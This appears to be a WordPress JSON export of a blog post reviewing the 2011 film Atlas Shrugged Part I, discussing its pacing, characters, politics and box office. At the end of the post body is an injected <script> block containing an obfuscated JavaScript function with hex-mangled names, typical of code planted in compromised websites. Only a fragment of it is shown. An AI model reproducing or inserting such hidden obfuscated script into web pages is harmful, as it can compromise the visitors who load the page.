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that the acting seemed good, the fidelity to the book about right, and that the writers picked the right parts to hold onto and the right portions to let go &#8211; seems about right to me. \u00a0The budget &#8211; a mere $10 million, shot quickly to retain the rights &#8211; should also be kept in mind.<\/p>\n<p>That said, the movie could have benefitted from slowing down in a couple of ways. \u00a0Dagny&#8217;s entrance in the book &#8211; riding the train, taking control of a muddled situation on the line, musing about promoting Owen Kellogg &#8211; would have made the scene with Kellogg work better. \u00a0It&#8217;s ok to make Midas Mulligan disappear after introducing him to a really pompous-sounding John Galt. \u00a0We don&#8217;t need to know him, and we don&#8217;t know Galt. \u00a0But Kellogg isn&#8217;t a Producer, he&#8217;s a <em>potential<\/em> producer who right now is just a competent guy. \u00a0Dagny needs him because the line is falling apart all over the country, and that&#8217;s the only context in which we&#8217;re going to care about him either.<\/p>\n<p>We&#8217;re <em>told<\/em> that American infrastructure is disintegrating into dust with footage from a train wreck and an opening scene that looks like it was pulled from the Kobe, Japan earthquake. \u00a0A scene where Dagny has to basically take control of a side-tracked train would <em>show<\/em> it to us, which is what movies are supposed to do. \u00a0I know $10 million doesn&#8217;t leave a lot for on-location shooting. \u00a0One of the reviewers&#8217; favorite complaints is that the move spends too much time with people talking in offices. \u00a0But that&#8217;s true of all boardroom and courtroom dramas, including a couple of my favorites, <em><a title=\"Holden &amp; Bogart\" href=\"http:\/\/www.imdb.com\/title\/tt0046963\/\" target=\"_blank\">Executive Suite<\/a>, <\/em>and <em><a title=\"Holden, Bogart, Hepburn\" href=\"http:\/\/www.imdb.com\/title\/tt0047437\/\" target=\"_blank\">Sabrina<\/a><\/em>.<\/p>\n<p>One complaint that I had about <em>Atlas Shrugged<\/em> the book is that I don&#8217;t think Rand really articulated what drives the Carnegies, Vanderbilts, and Fords to build. \u00a0She has her stand-in for them, Hank Rearden say that his only purpose <em>is<\/em> to make money. \u00a0I think this slightly misses the mark, that Arthur Brooks&#8217;s &#8220;<a title=\"Arthur Brooks\" href=\"http:\/\/washingtonexaminer.com\/node\/65221\" target=\"_blank\">earned success<\/a>&#8221; is closer, and that making money is largely a by-product of that success. \u00a0You&#8217;ll hear that from any number of wildly successful businessmen.<\/p>\n<p>The movie actually captures this notion better than the book, in a brief scene where Rearden turns down an offer for the rights to his metal, &#8220;Because it&#8217;s mine,&#8221; in a way that the iron mines and foundries weren&#8217;t. \u00a0Those were all <em>managed <\/em>by him, but his <em>contribution<\/em> is his metal.<\/p>\n<p>Most reviewers will also allow their impatience with the subject matter to cloud their judgment about the movie as a whole. \u00a0There&#8217;s almost nothing to be done about that. \u00a0It&#8217;s an inherently political movie as much as an inherently economic one. \u00a0Wesley Mouch, in announcing his czar-like plans for the country&#8217;s economy, sounds almost exactly like Obama. \u00a0I&#8217;m afraid that too many reviewers will assume that the dialog was written with current Democrats in mind, without realizing that it&#8217;s <a href=\"http:\/\/online.wsj.com\/article\/SB123146363567166677.html\" target=\"_blank\">Obama who sounds like Mouch<\/a>.<\/p>\n<p>That openning scene with Dagny would also have let us see her listening to Richard Halley&#8217;s music on her iPod or iPad3. \u00a0The train, finally on track, speeding off into the dark towards New York, to what Rand described as his &#8220;heroic&#8221; music, would not only have given us insight into Dagny&#8217;s character, it would have given the lie to the idea that only the industrial is beautiful to industrialists.<\/p>\n<p>The overall per-screen take for the weekend was\u00a0<a href=\"http:\/\/www.boxofficemojo.com\/weekend\/chart\/?view=&amp;yr=2011&amp;wknd=15&amp;sort=avg&amp;order=DESC&amp;p=.htm\" target=\"_blank\">pretty good<\/a>, (via the\u00a0<a title=\"Wah-hoo-wah\" href=\"http:\/\/www.examiner.com\/libertarian-in-charlottesville\/audience-reactions-to-atlas-shrugged-movie-mixed-box-office-returns-respectable\" target=\"_blank\">Charlottesville Libertarian<\/a>) and hopefully, good enough to get it some additional screens this weekend when the acid test of a word-of-mouth movie comes. \u00a0(The movie&#8217;s website had actively promoted &#8220;demanding&#8221; the film, which had resulted in a more screens being added at the last minute, including one in Omaha and one in Lincoln.)<\/p>\n<p>Harmon Kaslow, the movie&#8217;s producer, has said that he needs $100 million in box office to justify making Part II. \u00a0I hope he gets it.<br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Susie and I went to go see Atlas Shrugged last night over at the Aurora 16. \u00a0I&#8217;m not a big fan of saying something just to hear myself blog, so I&#8217;ll limit myself here to comments that I don&#8217;t think I&#8217;ve seen anywhere before. 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